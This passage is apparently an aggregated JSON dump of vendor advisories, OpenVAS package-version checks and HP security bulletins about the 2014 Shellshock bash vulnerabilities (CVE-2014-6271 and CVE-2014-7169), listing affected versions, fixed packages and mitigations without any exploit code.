script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5_10.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:38", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310868211", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868211", "title": "Fedora Update for bash FEDORA-2014-11514", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-11514\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868211\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:18 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-11514\");\n script_tag(name:\"affected\", value:\"bash on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11514\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138679.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.48~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T17:23:27", "bulletinFamily": "unix", "description": "Tavis Ormandy discovered that the security fix for Bash included in USN-2362-1 was incomplete. An attacker could use this issue to bypass certain environment restrictions. (CVE-2014-7169)", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "USN-2363-1", "href": "https://usn.ubuntu.com/2363-1/", "title": "Bash vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:21:59", "bulletinFamily": "unix", "description": "USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch for CVE-2014-7169 didn\u2019t get properly applied in the Ubuntu 14.04 LTS package. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nTavis Ormandy discovered that the security fix for Bash included in USN-2362-1 was incomplete. An attacker could use this issue to bypass certain environment restrictions. (CVE-2014-7169)", "modified": "2014-09-26T00:00:00", "published": "2014-09-26T00:00:00", "id": "USN-2363-2", "href": "https://usn.ubuntu.com/2363-2/", "title": "Bash vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2019-05-30T07:36:47", "bulletinFamily": "unix", "description": "New bash packages are available for Slackware 13.0 to fix a security issue.\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/bash-3.1.018-i486-3_slack13.0.txz: Rebuilt.\n The patch for CVE-2014-7169 needed to be rebased against bash-3.1 in order\n to apply correctly. Thanks to B. Watson for the bug report.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.018-i486-3_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.018-x86_64-3_slack13.0.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n17fe761daf847490e6286a6c59abd913 bash-3.1.018-i486-3_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n7eb0a4741287042658487f2b6089a4c5 bash-3.1.018-x86_64-3_slack13.0.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bash-3.1.018-i486-3_slack13.0.txz", "modified": "2014-09-25T16:07:03", "published": "2014-09-25T16:07:03", "id": "SSA-2014-0925160703", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.309194", "title": "bash (rebuild for Slackware 13.0 only)", "type": "slackware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T07:36:48", "bulletinFamily": "unix", "description": "New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/bash-4.2.048-i486-2_slack14.1.txz: Rebuilt.\n Patched an additional trailing string processing vulnerability discovered\n by Tavis Ormandy.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.018-i486-2_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.018-x86_64-2_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bash-4.1.012-i486-2_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bash-4.1.012-x86_64-2_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bash-4.1.012-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bash-4.1.012-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bash-4.2.048-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bash-4.2.048-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bash-4.2.048-i486-2_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bash-4.2.048-x86_64-2_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/bash-4.3.025-i486-2.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/bash-4.3.025-x86_64-2.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n93780575208505d17b5305b202294e16 bash-3.1.018-i486-2_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n6ec269c8e958cd6265821b480af8e5d7 bash-3.1.018-x86_64-2_slack13.0.txz\n\nSlackware 13.1 package:\n21235413470903bb8eec907acb5b3248 bash-4.1.012-i486-2_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ne69bacaf484e8f924c09eacd91c8c737 bash-4.1.012-x86_64-2_slack13.1.txz\n\nSlackware 13.37 package:\nfa05abe5c8d6557ec1cef124e5d877ce bash-4.1.012-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n97a0005c1e0701c8912dc30f8a6f2908 bash-4.1.012-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\nd319186a0ab7e85562684669afc878c3 bash-4.2.048-i486-2_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n8835dc729d6029fc20b6b1b1df72ce13 bash-4.2.048-x86_64-2_slack14.0.txz\n\nSlackware 14.1 package:\nfbb4b906de3a8f9bf5209fcc80e2a413 bash-4.2.048-i486-2_slack14.1.txz\n\nSlackware x86_64 14.1 package:\na786b69705d1ebb67fbf31df9d032699 bash-4.2.048-x86_64-2_slack14.1.txz\n\nSlackware -current package:\nbba7e4260df8c4d91d99dbf13d44ec79 a/bash-4.3.025-i486-2.txz\n\nSlackware x86_64 -current package:\n7c9a285415bd636469da0cf405bb5692 a/bash-4.3.025-x86_64-2.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bash-4.2.048-i486-2_slack14.1.txz", "modified": "2014-09-25T13:38:49", "published": "2014-09-25T13:38:49", "id": "SSA-2014-268-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.495008", "title": "bash", "type": "slackware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:40", "bulletinFamily": "unix", "description": "[4.2.45-5.2.0.1]\n- Preliminary fix for CVE-2014-7169", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "ELSA-2014-3076", "href": "http://linux.oracle.com/errata/ELSA-2014-3076.html", "title": "bash security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:38", "bulletinFamily": "unix", "description": "[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "ELSA-2014-3078", "href": "http://linux.oracle.com/errata/ELSA-2014-3078.html", "title": "bash security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:34", "bulletinFamily": "unix", "description": "[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "ELSA-2014-3077", "href": "http://linux.oracle.com/errata/ELSA-2014-3077.html", "title": "bash security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:19", "bulletinFamily": "unix", "description": "[4.1.2-15.1.0.1]\n- Preliminary fix for CVE-2014-7169", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "ELSA-2014-3075", "href": "http://linux.oracle.com/errata/ELSA-2014-3075.html", "title": "bash security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:46", "bulletinFamily": "unix", "description": "[4.2.45-5.4]\n- CVE-2014-7169\n Resolves: #1146324\n[4.2.45-5.3]\n- amend patch to match upstream's\n Related: #1146324\n[4.2.45-5.2]\n- Fix-up the patch\n Related: #1141647", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "ELSA-2014-1306", "href": "http://linux.oracle.com/errata/ELSA-2014-1306.html", "title": "bash security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:54", "bulletinFamily": "unix", "description": "[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]", "modified": "2014-09-26T00:00:00", "published": "2014-09-26T00:00:00", "id": "ELSA-2014-3079", "href": "http://linux.oracle.com/errata/ELSA-2014-3079.html", "title": "bash security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nMITRE is currently using CVE-2014-7169 to track the report of the\r\nincomplete patch, i.e., incorrect function parsing that's present in\r\nbuilds that are up-to-date with the\r\nhttp://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025 changes. We\r\nrealize that other people may be releasing further information about\r\nthe technical details and implications later. CVE-2014-7169 expresses\r\nthe affected upstream versions as "GNU Bash through 4.3 bash43-025" --\r\nin general, this would include distribution packages released earlier\r\ntoday (2014-09-24).\r\n\r\n- -- \r\nCVE assignment team, MITRE CVE Numbering Authority\r\nM/S M300\r\n202 Burlington Road, Bedford, MA 01730 USA\r\n[ PGP key available through http://cve.mitre.org/cve/request_id.html ]\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (SunOS)\r\n\r\niQEcBAEBAgAGBQJUI3DaAAoJEKllVAevmvms+/kH/32ZGjC+BSqKoz6ZBUCMLnQ2\r\n+Li91/GvD0Rs8bqKPDsz30spiJR57ZluKMrlxJrlIffiHqAFiYkQ3+JXmnK/HAnA\r\nOtgToNtZ+1BV2jPrjXhuy2h+E5paTXMhM0T12xaUo89vtE7oer4Pld4JDqreXSSk\r\n1Nfu5AaGcvbBmwaNRn1qw+nARw0CFPmMRa169jQAesAAcyNx8V7IPgFpPj4K4S8c\r\n0zKXVdhIZxXvPcdZ5QzXKhcluOyOl1dJsjXR1qXT03QJsvhRighqb/3dZy+4mLyl\r\nJWhDfs7l8XXGCzbF8eSg2CNBpTGy1d/32F7YqaKj53xWFWyktHtbk4nJ5hlPlKU=\r\n=E9tp\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "SECURITYVULNS:DOC:31106", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31106", "title": "[oss-security] Re: CVE-2014-6271: remote code execution through bash", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04468293\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04468293\r\nVersion: 2\r\n\r\nHPSBHF03119 rev.2 - HP DreamColor Professional Display running Bash Shell,\r\nRemote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-09-30\r\nLast Updated: 2014-10-01\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP DreamColor\r\nZ27x Professional Display running Bash Shell . This is the Bash Shell\r\nvulnerability known as "ShellShock" which could be exploited remotely to\r\nallow execution of code.\r\n\r\nNOTE: Only the HP DreamColor Z27x model is vulnerable.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101725\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP DreamColor Z27x\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted product\r\nversions of HP DreamColor Z27x Professional Display. The display provides\r\ncalibration and remote management functionality running on embedded Linux,\r\nwhich includes a bash shell. The shell is not accessible via the standard\r\ncalibration or remote management interfaces.\r\n\r\nThis bulletin will be revised when the firmware update is released.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 September 2014 Initial release\r\nVersion:2 (rev.2) - 1 October 2014 Clarified Resolution\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQsiJAACgkQ4B86/C0qfVkNaACguv7uwEW8LXyHRpAZ7rsOihoS\r\nmTcAn1o+pVwNz5a5E5FKWg/w0fJHt0Sx\r\n=6l1G\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-10-05T00:00:00", "published": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31130", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31130", "title": "[security bulletin] HPSBHF03119 rev.2 - HP DreamColor Professional Display running Bash Shell, Remote Code Execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04467807\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04467807\r\nVersion: 1\r\n\r\nHPSBGN03117 rev.1 - HP Remote Device Access: Virtual Customer Access System\r\n(vCAS) running Bash Shell, Remote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-09-30\r\nLast Updated: 2014-09-30\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Remote Device\r\nAccess: Virtual Customer Access System (vCAS) running Bash Shell . This is\r\nthe Bash Shell vulnerability known as "ShellShock" which could be exploited\r\nremotely to allow execution of code.\r\n\r\n NOTE: The vCAS product is vulnerable only if DHCP is enabled.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101724\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nvCAS version 14.06 (RDA 8.1)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted product\r\nversions of HP Remote Device Access: Virtual Customer Access System (vCAS)\r\nrunning Bash Shell. This bulletin will be revised when the software update is\r\nreleased.\r\n\r\nNOTE: HP recommends to not power-down or disconnect the vCAS until the update\r\nis available.\r\n\r\nMITIGATION INFORMATION\r\n\r\nA Shellshock attack requires the definition of an environment variable\r\nintroduced into Bash. The vCAS has three attack vectors: SSH, the lighttpd\r\nweb server, and the DHCP client.\r\n\r\n - The exploit does not elevate privileges.\r\n - The SSH and webserver exploits require vCAS credentials so there is no\r\nrisk for unauthorized access or code execution through this vulnerability.\r\n\r\nThe DHCP client uses Bash scripts and is vulnerable to Shellshock. The DHCP\r\nexploit can be mitigated by ensuring that DHCP is disabled on the vCAS.\r\n\r\n Note: HP strongly discourages the use of DHCP on the vCAS.\r\n\r\nThe web UI forces the vCAS user to assign a static IP address and change the\r\nhp-admin password. A vCAS user must manually configure DHCP for use on the\r\nvCAS.\r\n\r\nA vCAS user can verify that DHCP is disabled by inspecting the file\r\n"/etc/network/interfaces" and ensuring that the "iface" line for device\r\n"eth0" is set for a static IP.\r\n\r\n Example of a static IP configuration:\r\n\r\n # The primary network interface\r\n auto eth0\r\n iface eth0 inet static\r\n address 172.27.1.68\r\n netmask 255.255.255.0\r\n gateway 172.27.1.1\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 September 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQrBP4ACgkQ4B86/C0qfVmXyQCfcKhAA0uY3dImfSwtEVk8Za3c\r\nvj4AnjNi4SmLcQFrPcGjdzRDt8U1OGS/\r\n=6Tia\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-10-05T00:00:00", "published": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31135", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31135", "title": "[security bulletin] HPSBGN03117 rev.1 - HP Remote Device Access: Virtual Customer Access System (vCAS) running Bash Shell, Remote Code Execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04471532\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04471532\r\nVersion: 1\r\n\r\nHPSBST03122 rev.1 - HP StoreAll Operating System Software running Bash Shell,\r\nRemote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-10-09\r\nLast Updated: 2014-10-09\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreAll\r\nOperating System Software running Bash Shell. This is the Bash Shell\r\nvulnerability known as "Shellshock" which could be exploited remotely to\r\nallow execution of code.\r\n\r\nReferences:\r\n\r\n CVE-2014-6271\r\n\r\n CVE-2014-7169\r\n\r\n SSRT101717\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP StoreAll Operating System Software v6.5.3 and earlier.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available to resolve the\r\nvulnerability with HP StoreAll Operating System Software running Bash Shell.\r\n\r\n - HP StoreAll OS v6.5.5\r\n\r\n - HP StoreAll OS v6.3.4\r\n\r\n Note: HP StoreAll OS v6.3.4 will be available soon. This security\r\nbulletin will be revised when it is available.\r\n\r\n To request an upgrade or installation:\r\n\r\n 1. Go to: http://www.hp.com/support/storeallsoftware\r\n\r\n 2. Under Download Index, select Software, then select Obtain software.\r\n\r\n 3. Complete the software registration form, and the HP StoreAll\r\nadministrator will contact you for the next steps.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 October 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that 